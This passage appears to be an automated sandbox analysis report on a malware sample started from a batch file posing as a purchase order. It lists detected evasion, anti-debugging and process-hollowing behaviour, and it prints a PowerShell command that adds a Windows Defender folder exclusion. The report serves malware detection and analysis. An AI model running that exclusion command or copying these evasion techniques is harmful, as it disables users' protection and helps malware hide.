                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Allocates many large memory junks
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2DB0000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2DB1000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2DDC000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2DDD000 memory commit 500199424
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E0E000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2F06000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2F08000 memory commit 500015104
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2C30000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2C31000 memory commit 500178944Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2C5C000 memory commit 500002816Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2C5D000 memory commit 500199424Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2C8E000 memory commit 501014528Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2D86000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2D88000 memory commit 500015104Jump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2B90000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2B91000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2BBC000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2BBD000 memory commit 500199424
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2BEE000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2CE6000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2CE8000 memory commit 500015104
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2EA90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2EF40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2ED80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: ED0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 5C30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2DC30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: BB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 2640000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 4640000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 31CD0000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 31F70000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 31CD0000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 23450000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 25480000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 252E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 780000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2400000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 4400000 memory reserve | memory write watch
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,10_1_004019F0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5587
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 356
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 2394
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 7396
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_10-12210
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 1484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 1924Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep count: 5587 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 504Thread sleep count: 356 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 5948Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 5464Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7144Thread sleep time: -143640000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7144Thread sleep time: -443760000s >= -30000s
                      Source: C:\Windows\System32\dllhost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,6_2_02C358B4
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                      Source: x.exe, 00000006.00000002.2450193992.00000000005B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhs_%SystemRoot%\system32\mswsock.dll
                      Source: Oupzhkpr.PIF, 00000019.00000002.2768525575.00000000006C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                      Source: Microsofts.exe, 0000000D.00000002.4620201909.0000000000800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                      Source: x.exe, 00000006.00000002.2450193992.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: x.exe, 00000006.00000002.2450193992.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                      Source: Oupzhkpr.PIF, 00000015.00000002.2593221559.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_6-30461
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C4EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,6_2_02C4EBF0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_0040CE09
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,10_1_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C487A0 LoadLibraryW,GetProcAddress,FreeLibrary,6_2_02C487A0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0040ADB0 GetProcessHeap,HeapFree,10_1_0040ADB0
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_0040CE09
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_0040E61C
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_00416F6A
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 10_1_004123F1 SetUnhandledExceptionFilter,10_1_004123F1
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0040CE09
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0040E61C
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00416F6A
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 24_2_004123F1 SetUnhandledExceptionFilter,24_2_004123F1
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0040CE09
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0040E61C
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00416F6A
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_2_004123F1 SetUnhandledExceptionFilter,29_2_004123F1
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_1_0040CE09
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_1_0040E61C
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_1_00416F6A
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 29_1_004123F1 SetUnhandledExceptionFilter,29_1_004123F1
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                      Sample uses process hollowing technique
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                      Writes to foreign memory regions
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 2FB008Jump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 2C7008
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 296008
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pifJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
